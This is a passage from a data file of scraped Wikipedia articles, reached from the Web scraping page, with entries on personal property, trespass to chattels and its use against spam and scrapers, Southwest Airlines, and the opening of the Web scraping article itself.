168 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Personal_property | Personal property is property that is movable. 1 In common law systems, personal property may also be called chattels or personalty. In civil law systems, personal property is often called movable property or movables—any property that can be moved from one location to another. Personal property can be understood in comparison to real estate, immovable property or real property (such as land and buildings). Movable property on land (larger livestock, for example) was not automatically sold with the land, it was "personal" to the owner and moved with the owner. The word cattle is the Old Norman variant of Old French chatel, chattel (derived from Latin capitalis, "of the head"), which was once synonymous with general movable personal property. 2 Personal property may be classified in a variety of ways. Intangible personal property or "intangibles" refers to personal property that cannot actually be moved, touched or felt, but instead represents something of value such as negotiable instruments, securities, service (economics), and intangible assets including chose in action. 3 Tangible personal property refers to any type of property that can generally be moved (i.e., it is not attached to real property or land), touched or felt. These generally include items such as furniture, clothing, jewelry, art, writings, or household goods. In some cases, there can be formal title documents that show the ownership and transfer rights of that property after a person's death (for example, motor vehicles, boats, etcetera) In many cases, however, tangible personal property will not be "titled" in an owner's name and is presumed to be whatever property he or she was in possession of at the time of his or her death. 4 Accountants distinguish personal property from real property because personal property can be depreciated faster than improvements (while land is not depreciable at all). It is an owner's right to get tax benefits for chattel, and there are businesses that specialize in appraising personal property, or chattel. The distinction between these types of property is significant for a variety of reasons. Usually, one's rights on movables are more attenuated than one's rights on immovables (or real property). The statutes of limitations or prescriptive periods are usually shorter when dealing with personal or movable property. Real property rights are usually enforceable for a much longer period of time and in most jurisdictions real estate and immovables are registered in government-sanctioned land registers. In some jurisdictions, rights (such as a lien or other security interest) can be registered against personal or movable property. In common law it is possible to place a mortgage upon real property. Such a mortgage requires payment, or the owner of the mortgage can seek foreclosure. Personal property can often be secured with a similar kind of device, variously called a chattel mortgage, a trust receipt, or a security interest. In the United States, Article 9 of the Uniform Commercial Code governs the creation and enforcement of security interests in most (but not all) types of personal property. There is no similar institution to the mortgage in the civil law, however a hypothec is a device to secure real rights against property. These real rights follow the property along with the ownership. 
In common law a lien also remains on the property, and it is not extinguished by alienation of the property; liens may be real or equitable. Many jurisdictions levy a personal property tax, an annual tax on the privilege of owning or possessing personal property within the boundaries of the jurisdiction. Automobile and boat registration fees are a subset of this tax. Most household goods are exempt as long as they are kept or used within the household. The distinction between tangible and intangible personal property is also significant in some of the jurisdictions which impose sales taxes. In Canada, for example, provincial and federal sales taxes were imposed primarily on sales of tangible personal property whereas sales of intangibles tended to be exempt. The move to value-added taxes, under which almost all transactions are taxable, has diminished the significance of the distinction. 5 Private and personal property are considered to be identical without the need for a distinction. 6 |
169 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Trespass_to_chattels | Trespass to chattels is a tort whereby the infringing party has intentionally (or, in Australia, negligently) interfered with another person's lawful possession of a chattel (movable personal property). The interference can be any physical contact with the chattel in a quantifiable way, or any dispossession of the chattel (whether by taking it, destroying it, or barring the owner's access to it). As opposed to the greater wrong of conversion, trespass to chattels is argued to be actionable per se. The origin of the concept comes from the original writ of trespass de bonis asportatis. As in most other forms of trespass, remedy can only be obtained once it is proven that there was direct interference regardless of damage being done, and the infringing party has failed to disprove either negligence or intent. In some common-law countries, such as the United States and Canada, a remedy for trespass to chattels can only be obtained if the direct interference was sufficiently substantial to amount to dispossession, or alternatively where there had been an injury proximately related to the chattel. (See Restatement (Second) of Torts, 1965.) The Restatement of Torts, Second 217 defines trespass to chattels as "intentionally… dispossessing another of the chattel, or using or intermeddling with a chattel in the possession of another. Harm to personal property or diminution of its quality, condition or value as a result of a defendant's use can also result in liability under 218(b) of the Restatement. Certain specific circumstances may lend themselves to liability for the action. The Restatement (Second) of Torts 218 states further that: One who commits a trespass to a chattel is subject to liability to the possessor of the chattel if, but only if, The trespass to chattels cause of action, frequently asserted in recent years against Internet advertisers and email spammers, is often included in complaints against spyware companies. These electronic messaging cases, and their progeny, which have cropped up over the last decade, will typically turn on the situations described in (b) or (d), and, as detailed below, the question of harm caused is a big issue. In sum, the basic elements of a claim of trespass to chattels are: 1) the lack of the plaintiff's consent to the trespass, 2) interference or intermeddling with possessory interest, and 3) the intentionality of the defendant's actions. Actual damage is not necessarily a required element of a trespass to chattels claim. 1 2 Damages from a trespass claim are limited to the actual harm sustained by the plaintiff (which can include economic loss consequent on the trespass - e.g. loss of profit on a damaged chattel). In cases of dispossession, the plaintiff is always entitled to damages if they can prove the dispossession occurred, even if no quantifiable harm can be proven. A related tort is conversion, which involves an exercise of control over another's chattel justifying restitution of the chattel's full value. Some actions constitute trespass and conversion; in these cases, a plaintiff must choose which claim to make based on what amount of damages they seek to recover. The common law tort of trespass to chattels has been invoked in the modern context of electronic communications to combat the proliferation of unsolicited bulk email, commonly known as spam. 
2 In addition, several companies have successfully used the tort to block certain people, usually competitors, from accessing their servers. Though courts initially endorsed a broad application of this legal theory in the electronic context, more recently other jurists have narrowed its scope. As trespass to chattels is extended further to computer networks, some fear that plaintiffs are using this cause of action to quash fair competition and to deter the exercise of free speech; consequently, critics call for the limitation of the tort to instances where the plaintiff can demonstrate actual damages. The trespass to chattels tort punishes anyone who substantially interferes with the use of another's personal property, or chattels. Plaintiffs must show that the offender had intentional physical contact with the chattel and that the contact caused some substantial interference or damage. The courts that imported this common law doctrine into the digital world reasoned that electrical signals traveling across networks and through proprietary servers may constitute the contact necessary to support a trespass claim. Applying this common law action to computer networks, plaintiffs must first prove that they received some type of electronic communication (typically bulk e-mail or spam) that the defendant intentionally sent to interfere with the plaintiff's interest in his or her property and second that this communication caused a quantifiable harm to their tangible property, such as impaired functioning of the computer, network or server. 3 In the late 1990s, when the World Wide Web was in its infancy, courts were more receptive to extending the trespass to chattels tort to the electronic context. In CompuServe Inc. v. Cyber Promotions, Inc., a 1997 case that was the first to extend the trespass theory to computer networks, a federal district court held that a marketing company's mass mailing of a high volume of unsolicited advertisement emails to CompuServe subscribers constituted an actionable trespass to chattels. 4 CompuServe customers repeatedly received unwanted advertisements from Cyber Promotions, a company that specialized in sending marketing email in bulk. Cyber Promotions also modified its equipment and falsified other information to circumvent CompuServe's anti-spam measures. Due to the high volume of email, CompuServe claimed damage to its servers as well as money lost dealing with customer complaints and dissatisfaction. CompuServe also extended its damages claim to its subscribers who spent time deleting unwanted email. The court held that Cyber Promotions's intentional use of CompuServe's proprietary server was an actionable trespass to chattels and granted a preliminary injunction enjoining the spammer from sending unsolicited advertisements to any email address maintained by CompuServe. Cyber Promotions' persistence in sending email to CompuServe's servers after receiving notification that CompuServe no longer consented to the use weighed heavily in favor of a finding of trespass. A trio of 1998 cases in the Eastern District of Virginia involving America Online more firmly established the use of the trespass to chattels tort as a spam-fighting tool. In America Online, Inc. v. IMS, the court held that the owner of a marketing company committed trespass to chattels against an Internet service provider's (ISP) computer network by sending 60 million unauthorized email advertisements to the ISP's subscribers after being notified that the spam was unauthorized. 
5 The court found that the defendant, intentionally and without authorization, caused contact with the plaintiff's computer network by sending the bulk email messages. Such contact injured the plaintiff's business goodwill and diminished the functioning of its computer network. Similarly, in America Online, Inc. v. LCGM, Inc., a company engaging in pornographic website advertising sent a deluge of spam to AOL's customers, and, in so doing, also forged the AOL domain name in an effort to trick customers into opening the emails. 6 The court once again held that a website operators' transmission of unsolicited bulk emails to customers of an ISP, using the provider's computers and computer network, constituted trespass to chattels. In America Online, Inc. v. Prime Data Systems, Inc., the defendants sent millions of spam emails to AOL subscribers advertising computer software programs designed to facilitate bulk emailing by allowing users to harvest email addresses from the plaintiff's member directories, chat rooms, and electronic bulletin boards. 7 The defendants also used technology designed to avoid AOL's spam filtering mechanisms. The defendants frequently used false and deceptive "headers" in email messages to make it appear as if AOL had sent the messages. The increased demand on AOL's servers resulting from the spam caused substantial delays of up to 24 hours in the delivery of all email to AOL members, forcing AOL to temporarily stop accepting any new messages. As the spam problem grew worse, AOL had to purchase millions of dollars worth of additional equipment to increase the capacity of its servers to handle the volume of email. The court held that this activity constituted a trespass to chattels and awarded injunctive relief, reasonable attorneys' fees and costs, as well as damages. Since the early spam cases, courts have extended the electronic trespass to chattels theory even further to encompass screen-scraping and other data "harvesting. Screen-scraping is the practice of taking information from another website, generally through the use of search agent software, and "harvesting" the data for one's own commercial use. For example, travel websites frequently use this tactic to offer a host of options and prices gleaned from various airlines' sites. Because the courts have entertained such litigation, some companies have specifically banned the conduct in their terms and conditions statements. 8 In eBay v. Bidder's Edge (2000), eBay successfully used the trespass to chattels tort to prevent Bidder's Edge from employing spiders to cull information about its auctions to display on its own website. 3 Although Bidder's Edge's robots only consumed a small percentage of eBay's computer resources, the court noted that the plaintiff need not demonstrate current substantial interference as conduct which constituted a use of another's property is enough to sustain a trespass to chattels claim. In light of this, the court found that eBay had demonstrated a sufficient likelihood of future injury to warrant granting a permanent injunction: "If the court were to hold otherwise, it would likely encourage other auction aggregators to crawl the eBay site, potentially to the point of denying effective access to eBay's customers. 3 Register.com, Inc. v. Verio, Inc. (2000) is a further example of this temporary trend in which plaintiffs did not have to demonstrate any real interference. 
9 Register.com, a domain name registry service, sued competitor Verio for using Register.com's proprietary WHOIS look-up service to find potential leads among its customer base. The court found that, by continuing to access Register.com's online customer database after being told to stop, Verio was trespassing on Register.com's WHOIS server. Register.com had specifically withdrawn its consent to Verio's use of search robots to review Register.com's customer list. The court held that Verio caused harm to Register.com's files through the use of these search robots and that the searches improperly taxed Register.com's server capacity. These holdings gave the court license to expand the applicability of trespass to chattels to computer networks even further. In Oyster Software v. Forms Processing (2001), the Northern District of California determined that a plaintiff need not demonstrate any physical interference with a server at all to sustain a trespass to chattels claim and consequently denied the defendant's motion for summary judgment, even though there was no evidence of damage to the plaintiff's computer system. 10 Although Oyster conceded that there was no evidence that the defendant's activities had interfered in any way with the functioning of Oyster's computer system, the court nonetheless denied FPI's motion for summary judgment. According to the court, following the decision in eBay, plaintiffs only need to demonstrate that the defendant's actions "amounted to a 'use' of Plaintiff's computer, and the court determined that copying the metatags amounted to a use. 10 These cases indicate that, at least in California, a plaintiff did not have to demonstrate any kind of actual interference with the computer system to successfully claim trespass to chattels. However, some courts subsequently limited tort claims for electronic trespasses, in that a complaining party may be unable to recover for lack of real harm if the party did not suffer any tangible damage to their property. The Supreme Court of California reversed the trend exemplified by Oyster in the seminal case Intel Corp. v. Hamidi (2003), reaffirming the need for a demonstration either of actual interference with the physical functionality of the computer system or of the likelihood that this would happen in the future. 11 Although Intel conceded that Hamidi's emails caused neither physical damage nor any disruption to their computer system, they alleged that the economic productivity lost due to the disruption caused by the emails could sustain a trespass claim. The Supreme Court of California disagreed, holding that the tort does not extend to claims in which the electronic communication involved "neither damages the recipient computer system nor impairs its function. 11 In reaching this conclusion, the court criticized the understanding of eBay advanced in Oyster, explaining that previous cases in which courts have found trespass to chattels in the electronic setting have involved either "actual or threatened interference with the computers' function. 11 To that effect, the court in Oyster misconstrued the holding in eBay; trespass requires more than use a use it requires an actual or threatened interference with the physical functionality of the system. Although the vast majority of states have yet to determine the applicability of the trespass to chattels theory, the courts that have addressed the issue have applied Intel and required that the plaintiff demonstrate damage to the computer system. 
A supreme court in New York in School of Visual Arts v. Kuprewicz denied the defendant's motion to dismiss for failure to state a claim on the trespass to chattels claim because the plaintiff had alleged actual damage to the functionality of the computer system, which Intel requires; the defendant had sent enough e-mails that it reduced the computer system's functionality and drained the hard drive's memory. 12 The Fourth Circuit in Omega World Travel, Inc. v. Mummagraphics, Inc. also followed Intel, although this resulted in granting a motion for summary judgment for the defendant because the plaintiff did not allege any actual damage on its computer system. 13 The court clarified that Oklahoma courts have yet to recognize the validity of a trespass to chattels claim based on an electronic intrusion to a computer system, but if it were to recognize it, the plaintiff would need to allege more than nominal damages, which in this case it had not. Although a number of commentators have expressed enthusiasm over the increasing "propertization" of intellectual property (that is to say, the increased application of real property doctrines to intangible property) and the extension of the trespass to chattels doctrine to computer networks, 14 a number of detractors have expressed concern over the ramifications of extending the theory to protect electronic communications that do not actually damage the computer systems in question but only cause nominal damage due to their content. 15 16 17 18 Primarily, these critics worry that extending trespass to chattels in this fashion would stifle free speech on the internet because any unwelcome email might constitute a trespass and may subject the sender not only to civil liability under the trespass theory but to criminal liability as well. 19 This would presumably reduce people's willingness to communicate freely on the Internet and curtail the Internet's ability to function as an open, democratic forum. 20 Particularly in situations where the electronic communication is an email that contains speech that is of importance to the public and the communications do not hamper the functionality of the recipient's computer system, First Amendment free speech protections ought to outweigh the property right in the unharmed computer system. 21 Similarly, critics have also expressed concerns that plaintiffs have employed the doctrine to stifle legitimate competition. 22 For example, the screen-scraping cases indicate that courts might interpret trespass to chattels in such a way that allows major corporations to prevent price comparison sites from employing harmless bots to aggregate information that users want in a readily accessible format since it might encourage consumers to look elsewhere. 23 Critics of the theory's extension to computer networks also note greater theoretical problems with the applicability of a real property theory to intellectual property. In order to explain why real property theories might extend to the Internet, proponents equate "cyberspace" with real land, arguing that owners of computer servers should have the same right of inviolability as owners of land receive to promote greater efficiency in transactions. 24 However, even if some aspects of cyberspace resemble real space, detractors contend that cyberspace is not like real land at all because "the 'placeness' of cyberspace is a matter of ongoing social construction. 
25 Furthermore, even if granting property rights might help to avoid problems of inefficiency and under-cultivation in the context of real property, critics note that nothing suggests that the same principles would also be effective in the context of computer networks—especially because the problem of under-cultivation does not tend to occur online. 26 |
171 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Southwest_Airlines | Southwest Airlines Co. is a major airline in the United States that operates on a low-cost carrier model. It is headquartered in Love Field, Dallas, in the Dallas Fort Worth metroplex, and has scheduled service to 121 destinations in the United States and ten other countries. 3 As of 2018 update , Southwest carried more domestic passengers than any other United States airline. 4 It is currently the third largest airline in the world based on passengers flown. 5 The airline was established on March 9, 1967, 6 by Herb Kelleher and Rollin King as Air Southwest Co. and adopted its current name, Southwest Airlines Co., in 1971, when it began operating as an intrastate airline wholly within the state of Texas, first flying between Dallas, Houston, and San Antonio. 7 8 It began regional interstate service in 1979, expanding nationwide in the following decades. Southwest currently serves airports in 42 states and multiple Central American destinations. Southwest's business model is distinct from other US airlines as it uses a rolling hub and point-to-point network and allows free checked baggage. It exclusively uses Boeing 737 jets in its fleet. The airline has nearly 66,100 employees and operates about 4,000 departures a day during peak travel season. 9 10 Southwest Airlines was founded in 1966 by Herbert Kelleher and Rollin King, and incorporated as Air Southwest Co. in 1967. Three other airlines (Braniff, Trans-Texas Airways, and Continental Airlines) took legal action to try to prevent the company from its planned strategy of undercutting their prices by flying only within Texas and thus being exempt from regulation by the federal Civil Aeronautics Board. The lawsuits were resolved in 1970, and in 1971 the airline changed its name to Southwest Airlines and began operating regularly scheduled flights between the Texas Triangle cities of Dallas, Houston, and San Antonio. In 1975, Southwest began flying to other cities in Texas, and in 1979, after passage of the Airline Deregulation Act, it began flying to adjacent states. It started service to the East and the Southeast in the 1990s, 11 and Denver in 2006, 12 which is now its most popular destination. Southwest Airlines was profitable for 47 consecutive fiscal years, from 1973 through 2019. 13 In May 2024, Southwest Airlines fares started showing on Google for the first time after long being excluded from the search engine's search results. 14 As of January 2024 update , Southwest Airlines flies to over 100 destinations in 42 states, Puerto Rico, Mexico, Central America, and the Caribbean. 15 Southwest does not use the traditional hub-and-spoke system of other major airlines, preferring a point-to-point system combined with a rolling-hub model in its base cities. As of July 2024 update , the Southwest Airlines fleet consists of 816 aircraft, making it the fourth-largest commercial airline fleet in the world. All of the aircraft Southwest Airlines operates are from the Boeing 737 family of narrow-body airliners. Since its inception, Southwest Airlines has almost exclusively operated Boeing 737 aircraft (except for a brief period when it operated a handful of leased Boeing 727 aircraft). Southwest is the world's largest operator of the Boeing 737, and was the launch customer of the 737 300, 737 500, and 737 700. 16 It took delivery of its 1,000th Boeing 737 in 2023. 
Using a single basic aircraft type allows Southwest pilots and flight attendants to crew any aircraft in the fleet without restrictions. 17 Southwest Airlines solely offers economy-class seats, and does not have business or first-class cabins on its aircraft. 22 Still, Southwest Airlines does offer many amenities, as follows: The company permits two free-of-charge checked bags per passenger, 23 24 and passengers are permitted to change their flight up to 10 minutes prior to their flights without extra charge. In the event of a cancellation, passengers are refunded a travel credit in the amount spent on their ticket, and the credit may be used toward other Southwest Airlines or Southwest Vacations purchase. The credit does not expire. 25 Southwest offers free in-flight nonalcoholic beverages and offers alcoholic beverages for sale for $6 to $7 per beverage. Free alcoholic drinks are offered to passengers who are at least 21 on some holidays such as Valentine's Day and Halloween. They also have complimentary snacks on all flights. Southwest has become known for colorful boarding announcements and crews who sometimes burst out in song. 26 27 28 29 Prior to 2007, Southwest boarded passengers by grouping the passengers into three groups, labeled A, B and C. Passengers would line up at their specified letter and board. 30 In 2007, Southwest modified its boarding procedure by introducing a number. Each passenger receives a letter (A, B, or C) and a number 1 through 60. Passengers line up in numerical order within each letter group and choose any open seat on the aircraft. 30 A 2012 study on the television series MythBusters, found this to be the fastest method currently in use for passengers to board a plane; on average, it is 10 minutes faster than the standard method. 31 The airline was also number-one on the 2020 Airline Quality Rating list. 32 Southwest has a "customer of size" policy in which the cost of a second seat is refunded for any plus-sized travelers who take up more room than one seat. 33 34 On July 25, 2024, Southwest announced that it will be ending its long-standing open seating policy - and thereby assigning seats - beginning in 2025. The airline will also introduce premium seating options with more legroom and launch overnight flights in 2025. 35 36 As of September 2023, Wi-Fi costs $8, and allows for streaming live television, movies, streaming music, and app messaging. 37 After completing a testing phase that began in February 2009, Southwest announced on August 21, 2009, that it would begin rolling out in-flight Wi-Fi Internet connectivity via Global Eagle Entertainment's satellite-broadband-based product. Southwest began adding Wifi to its aircraft in the first quarter of 2010. The airline began testing streaming live television in the summer of 2012 and video on demand in January 2013. 38 39 As of September 2, 2023, live in-flight TV, movies, messaging (iMessage and WhatsApp) 37 and real-time flight-tracking information via Wi-Fi is available to passengers, with full Internet access available at a fee for regular passengers. 40 Southwest first began to offer a frequent-flyer program on June 18, 1987, calling it The Company Club. The program credited for trips flown regardless of distance. 41 Southwest Airlines renamed its frequent flyer program Rapid Rewards on April 25, 1996. 42 The original Rapid Rewards program offered one credit per one-way flight from an origin to a destination, including any stops or connections on Southwest Airlines. 
When 16 credits were accumulated in a 24 month period, Southwest awarded one free round-trip ticket that was valid for 12 months. 43 On March 1, 2011, Rapid Rewards changed to a points system based on ticket cost. Members earn and redeem points based on a four-tier fare scale multiplier and the cost of the ticket. Changes also included no blackout dates, seat restrictions, or expiring credits. Since October 18, 2019, Rapid Rewards points do not expire as long as the member is alive. 44 It also adds more options to use points. 45 46 47 48 The key trends for Southwest Airlines are (as of the financial year ending December 31): 49 The Southwest Airlines headquarters are located on the grounds of Dallas Love Field in Dallas. 9 54 Chris Sloan of Airways magazine stated they are "as much a living, breathing museum and showcase for the 'culture that LUV built' as they are corporate offices. 55 On September 17, 2012, Southwest broke ground on a new Training and Operational Support building, 56 across the street from its current headquarters building. The property includes a two-story, 100,000 square-foot Network Operations Control building that can withstand an EF3 tornado. It also includes a four-story, 392,000 square-foot office, and training facility with two levels devoted to each function. The new facilities house 24 hour coordination and maintenance operations, customer support and services, and training. The project was completed in late 2013, with occupancy beginning in 2014. On June 2, 2016, Southwest broke ground on its new office and training facility known as Wings. The newest addition to the corporate campus is composed of a 420,000 square-foot, six-story office building, and a 380,000 square-foot adjoining structure called the Leadership Education and Aircrew Development (LEAD) Center that serves as the new pilot training facility. The LEAD Center has the capacity to house and support 18 flight simulators. It is designed to be expanded to accommodate up to 26 simulator bays. The building opened on April 3, 2018. 57 On August 16, 2019, Southwest announced an expansion of the LEAD Center to accommodate eight additional simulators for future operational and training demands. 58 On January 2, 2020, it was announced that Southwest would be purchasing an additional 3 acres (1.2 ha) of land adjacent to its Wings and LEAD facilities. 59 No additional details were disclosed. As of June 30, 2022 update , Southwest Airlines had 62,333 active full-time equivalent employees. 60 According to The Washington Post, it uses the hiring motto of seeking people that have a "Servant's Heart, Warrior Spirit, Fun-LUVing Attitude". 61 It also uses the internal practice of ranking "employees first, customers second". 62 Bob Jordan, formerly executive vice president of corporate services, became Southwest's sixth CEO on February 1, 2022, replacing Gary C. Kelly. Kelly continues as chairman of Southwest Airlines. Kelly replaced former CEO Jim Parker on July 15, 2004, and assumed the title of president on July 15, 2008, replacing former president Colleen Barrett. In July 2008, Herb Kelleher resigned from his position as chairman. Barrett left her post on the board of directors and as a corporate secretary in May 2008 and as president in July 2008. Kelleher was president and CEO of Southwest from September 1981 to June 2001. 
63 On June 23, 2021, Southwest announced that chairman and CEO Gary Kelly would transition roles in early 2022, becoming the carrier's executive chairman with the desire to serve in that role through at least 2026 at the discretion of the board of directors. Jordan also joined the board then. 64 On January 10, 2017, Southwest announced changes to the company's executive leadership ranks, with Thomas M. Nealon named as president and Michael G. Van de Ven as the airline's chief operating officer. 65 On September 14, 2021, Southwest announced Nealon had decided to retire from his duties as president effective immediately, but would continue to serve the company as a strategic advisor. Chief Operating Officer Mike Van de Ven was named as the company's president the same day, and remains COO. 66 About 83% of Southwest employees are members of a union. 67 The Southwest Airline Pilots' Association, a union not affiliated with the Air Line Pilots Association, represents the airline's pilots. 68 The aircraft maintenance technicians are represented by the Aircraft Mechanics Fraternal Association. 69 Customer service agents and reservation agents are represented by the International Association of Machinists and Aerospace Workers Union. Flight dispatchers, flight attendants, ramp agents, and operations agents are represented by the Transport Workers Union. The company has appeared on various "best places to work" list, with its employee culture mentioned by Travel and Leisure, CNBC, and Forbes. 70 71 The company has also been named to Fortune magazine's "Most Admired Companies" list, reaching number 14 in 2021. 72 Southwest has never furloughed an employee. 73 As a result of the COVID 19 pandemic, the company launched voluntary separation and extended time-off programs in 2020, and around 16,900 employees volunteered to take an early retirement or long-term leave. 74 Roughly 24% were pilots and 33% were flight attendants. 75 In late 2020, the airline issued some WARN Act notices and announced incipient pay cuts for many employees in response to pandemic impacts, but these measures were rescinded after the Consolidated Appropriations Act, 2021 was enacted on December 27, 2020, providing additional financial aid to US airlines. 76 Southwest and its business model have had an influence on other low-cost carriers (LCC's). The competitive strategy combines a high level of employee and aircraft productivity with low unit costs by reducing aircraft turnaround time, particularly at the gate. 77 Europe's EasyJet and Ryanair are two of the best-known airlines to follow Southwest's business strategy in that continent. Other airlines with a business model based on Southwest's system include Canada's WestJet, Malaysia's AirAsia (the first and biggest LCC in Asia), India's IndiGo, Australia's Jetstar, a subsidiary of Qantas (although Jetstar now operates three aircraft types), Philippines' Cebu Pacific, Thailand's Nok Air, Mexico's Volaris, Indonesia's Lion Air and Turkey's Pegasus Airlines. 77 Southwest Airlines has a history of lobbying against high-speed rail, which it sees as a competitor for short-distance commuter flights. In the early 1990s, Southwest lobbied US Congress and the Texas Legislature to oppose a high-speed rail system between Dallas, San Antonio, and Houston, and filed three lawsuits against the initiative. 
78 79 80 81 In 1991, Southwest told Texas authorities, "Rail has a romantic appeal, but this case cannot be decided on the basis of nostalgia or even a desire to emulate the rail service of France and Germany. The American reality is that high-speed rail will be viable in Texas only by destroying the convenient and inexpensive transportation service the airlines now provide, and only by absorbing huge public subsidies. 79 In 1994, the high-speed rail initiative was cancelled. 78 While several reasons led to the initiative's demise, most commentators attribute a key role to Southwest Airlines' aggressive campaign against it. 81 The company has always employed humor in its advertising. Former slogans include "Love Is Still Our Field", "Just Plane Smart", "The Somebody Else Up There Who Loves You", "You're Now Free to Move About the Country", "THE Low Fare Airline", "Grab your bag, It's On , and "Welcome Aboard". The airline's slogan (as of 2022) is "Low fares. Nothing to hide. That's TransFarency 82 In March 1992, shortly after Southwest started using the "Just Plane Smart" motto, Stevens Aviation, which had been using "Plane Smart" for its motto, advised Southwest that it was infringing on its trademark. 83 84 Instead of a lawsuit, the CEOs for both companies staged an arm-wrestling match. Held at the now-demolished Dallas Sportatorium and set for two out of three rounds, the loser of each round was to pay $5,000 to the charity of his choice, with the winner gaining the use of the trademarked phrase. A promotional video was created showing the CEOs "training" for the bout (with CEO Herb Kelleher being helped up during a sit-up where a cigarette and glass of Wild Turkey 101 whiskey was waiting) and distributed among the employees and also as a video press release along with the video of the match itself. Herb Kelleher lost the match for Southwest, with Stevens Aviation winning the rights to the phrase. Kurt Herwald, CEO of Stevens Aviation, immediately granted the use of "Just Plane Smart" to Southwest Airlines. The net result was both companies having use of the trademark. 85 Southwest has had nine accidents, including two aircraft hull losses and four deaths: one accidental passenger death in flight, two non-passenger deaths on the ground, and one passenger death from injuries he sustained when subdued by other passengers while attempting to break into the cockpit of an aircraft. The airline is considered among the safest in the world. No passenger has died as a result of a crash. 86 N7737E N8555Z On June 22, 2011, a March 25 recording was released to the press of an apparently inadvertent in-flight radio transmission of Southwest captain James Taylor conversing with his first officer. The conversation was peppered with obscenities directed at gay, overweight, and older flight attendants. According to Southwest, the pilot was reprimanded and temporarily suspended without pay and received diversity education before being reinstated. 90 91 92 On September 26, 2017, a woman was removed from a Southwest flight after claiming to have a life-threatening allergy to dogs, two of which were present on the aircraft, including a service animal. Southwest employees requested that she provide documentation of her condition and staff asked her to exit the aircraft multiple times. Police ultimately had to escort her away. 93 94 On December 29, 2017, a family was removed from a flight from Chicago Midway Airport because of an unconfirmed head lice accusation. 
The family did not have lice and was re-accommodated on a flight two days later. 95 In October 2019, a Southwest flight attendant filed a lawsuit against the airline, claiming that two pilots had livestreamed footage from a camera hidden in the plane's toilet to an iPad, and that one of the pilots said that such cameras were a "top-secret security measure" installed in all of the airline's 737 800 aircraft. 96 Southwest and the pilot union stated that the film was a hoax and a "poor attempt at humor" by one of the pilots, who had previously recorded himself on a different aircraft, fully clothed. 97 In February 2020, a report conducted by the DOT inspector general found that Southwest was flying airplanes with safety concerns and that the Federal Aviation Administration was failing to properly oversee the airline. 98 In 2020, a captain of a Southwest flight watched pornography on a laptop computer with his clothes removed while his female first officer continued her duties. The captain retired before the incident was reported, but he was subsequently prosecuted for intentionally committing a lewd, indecent or obscene act in a public place, and the airline terminated his retirement benefits. 99 100 On May 23, 2021, a female passenger aboard a Southwest flight repeatedly punched a female flight attendant in the face after landing at San Diego International Airport, causing the attendant to lose two teeth. The passenger was subsequently charged with causing serious bodily injury. 101 Citing four whistleblowers, federal investigators with the US Office of Special Counsel released a report on July 27, 2022, that follows up on the 2020 DOT inspector general's report. The 2022 report claims that Southwest stonewalled Federal Aviation Administration (FAA) investigations into maintenance and piloting safety lapses, and criticized the FAA for failing to adequately oversee the airline, stating that senior FAA staff "mismanaged and interfered" with investigations "in the face of SWA's intimidation tactics". The report accuses Southwest of misusing the FAA's Aviation Safety Action Program (ASAP) to hide pilot errors, while accusing the FAA of failing to adequately oversee Southwest's mechanics, and of failing to adequately vet maintenance records provided by the airline for forty-nine 737 aircraft purchased from foreign carriers whose documentation practices did not meet FAA standards. 102 The airline experienced severe delays and thousands of flight cancellations starting on December 21, 2022, and continuing through the Christmas holiday, a series of events commonly known as the Southwest Airlines holiday meltdown. 103 104 105 While many cancellations were due to bad weather from the severe late December winter storm across much of the United States, industry experts and SWAPA also blamed inadequate staffing and the airline's "outdated" employee scheduling system, citing reports of pilots waiting on hold on the telephone for up to eight hours awaiting work assignments. 106 107 On December 26, the airline initiated a massive system "reset", preemptively canceling thousands of flights and halting ticket sales over concerns that travelers might buy tickets for flights that were subsequently canceled. 107 Federal officials criticized the airline and US Department of Transportation (USDOT) Secretary Pete Buttigieg announced a formal investigation. 108 Some experts attributed the crisis to the lack of scheduling flexibility inherent in the airline's point-to-point operations model. 
109 Paul Krugman in The New York Times suggested the turmoil was not as much about corporate greed as some might expect and noted that despite an increasingly digitalized world, "there's a lot of physical action, and real-world labor, going on behind the scenes. 110 Another writer on the paper's opinion pages, Elizabeth Spiers, said this was an example of the airlines knowing they are offering passengers a poor deal but that many people have little choice given the alternatives. 111 In December 2023, the airline reached a settlement and received a record-setting $140 million fine from the USDOT, the largest fine ever imposed by the agency by a factor of roughly 30, and has reported losses exceeding $1.1 billion stemming from the crisis. 103 104 105 112 113 |
172 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_April_2023 | This category combines all articles needing additional references from April 2023 (2023 04) to enable us to work through the backlog more systematically. It is a member of Category:Articles needing additional references. The following 200 pages are in this category, out of approximately 3,507 total. This list may not reflect recent changes. |
173 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-20 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field 